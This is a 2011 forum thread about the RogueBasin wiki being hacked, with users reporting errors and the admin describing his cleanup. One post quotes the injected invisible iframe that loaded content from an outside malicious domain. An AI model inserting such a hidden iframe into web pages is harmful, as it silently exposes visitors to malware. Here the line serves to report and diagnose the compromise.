Temple of The Roguelike Forums

Websites => The Roguebasin => Topic started by: getter77 on May 31, 2011, 07:55:35 PM

Title: RogueBasin erroring out?
Post by: getter77 on May 31, 2011, 07:55:35 PM

"Content encoding error" when clicking on pretty much any link for the last day or so.

http://roguebasin.roguelikedevelopment.org/index.php?title=Main_Page

Title: Re: RogueBasin erroring out?
Post by: Ari Rahikkala on May 31, 2011, 08:07:11 PM

There's an extremely suspicious-looking iframe at the beginning of the transmitted page that might be causing this. Might be a good time to see if the wiki installation hasn't been compromised.

Title: Re: RogueBasin erroring out?
Post by: kipar on May 31, 2011, 08:07:42 PM

There is

Quote

<iframe src="http://vyguhou.cz.cc/go/1" width="1" height="1"></iframe>

In a page source, so I suspect roguebasin was hacked.

Title: Re: RogueBasin erroring out?
Post by: Slash on May 31, 2011, 09:00:06 PM

I will try to contact Bjorn and see what's up with this

Title: Re: RogueBasin erroring out?
Post by: Ouren on June 01, 2011, 03:55:25 AM

Yea, I was trying to update the SilverQuest page and I kept seeing this.

:/

Title: Re: RogueBasin erroring out?
Post by: K.I.L.E.R on June 02, 2011, 04:55:01 AM

If you use Google translator you can treat the page as Spanish and it will become readable in English.

Yes, I agree, this is very annoying!

EDIT: YAY! It is back.

Title: Re: RogueBasin erroring out?
Post by: daver64 on June 02, 2011, 08:07:30 AM

First of all, its my first post ( although I'm a long time lurker ), so, "Hi!" :)

Secondly, I'm afraid its still giving me errors on all the links in the development page ( http://roguebasin.roguelikedevelopment.org/index.php?title=Articles )

Cheers
Dave

ps : the admins might already be aware of this, but I'm posting just in case they are not :).

Title: Re: RogueBasin erroring out?
Post by: Darren Grey on June 03, 2011, 12:26:45 PM

Everything works fine for me.  All links okay, able to edit and update articles fine.  It seems to have become stricter with the captchas, but that's probably a good thing.  Thank you to whoever fixed it.

If you're still getting trouble I suggest trying to refresh the pages, since it may just be that your browser has some pages cached.

Title: Re: RogueBasin erroring out?
Post by: britzl on June 03, 2011, 10:03:36 PM

The site got hacked in some way. Some malicious content was injected on each page via some nastiness in index.php. After some googling it was evident that this same kind of hack occurred not only on Mediawiki but on CMS systems like Joomla, phpbb and so on (could it be a vulnerability in the ever so popular recaptcha?). Removing the hack from index.php only worked for a shot period of time and then the hack was reintroduced via some php that got invoked outside of the webroot. Removing that injectionscript made the whole thing go away, but to make sure we still didn't have a vulnerability somewhere I decided to go for a fresh MediaWiki install using the latest version. The recaptcha was also upgraded and I decided not to use the same code highlighting extension as in the previous version as that extension hadn't been updated in years.

Anyway, things should be back to normal now. If things fall apart again please e-mail me at bjorn dot ritzl at gmail dot com.